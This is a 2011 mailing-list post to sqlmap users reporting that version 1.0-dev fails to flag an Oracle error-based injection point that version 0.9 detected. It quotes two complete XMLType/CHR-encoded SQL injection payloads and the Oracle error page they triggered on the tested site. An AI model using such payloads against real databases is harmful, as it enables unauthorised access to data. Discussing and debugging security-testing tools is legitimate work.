[sqlmap-users] i think there may be a bug in "Oracle AND error-based - WHERE or HAVING clause (XMLT
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] i think there may be a bug in "Oracle AND error-based - WHERE or HAVING clause (XMLType)" in sqlmap1.0-dev
|
From: CoeTs7 <tm...@ho...> - 2011-12-04 13:29:33
|
when i test a injectable point, i found sqlmap0.9 can exploit while 1.0-dev(r4567) can not.
1.0-dev first send
testf') AND 3339=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(105)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (3339=3339) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(120)||CHR(110)||CHR(109)||CHR(58)||CHR(62))) FROM DUAL) AND ('QjCL'='QjCL
to see if the controllable part is in parentheses . the webpage return a "query Not properly closed" error.
so it go on to send
testf' AND 3339=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(105)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (3339=3339) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(120)||CHR(110)||CHR(109)||CHR(58)||CHR(62))) FROM DUAL) AND 'ZCna'='ZCn
the webpage return a error page contained
ORA-19202: XML 处理
LPX-00110: Warning: 无效的 QName ":tif:1:xnm:" (不是名称)
Error at line 1
when receive this, sqlmap0.9 will tell that this is injectable( this is obvious) but sqlmap 1.0 exit and tell me that all parameters appear to be not injectable. i tried to raise risk/level but that didn't work at all.
|
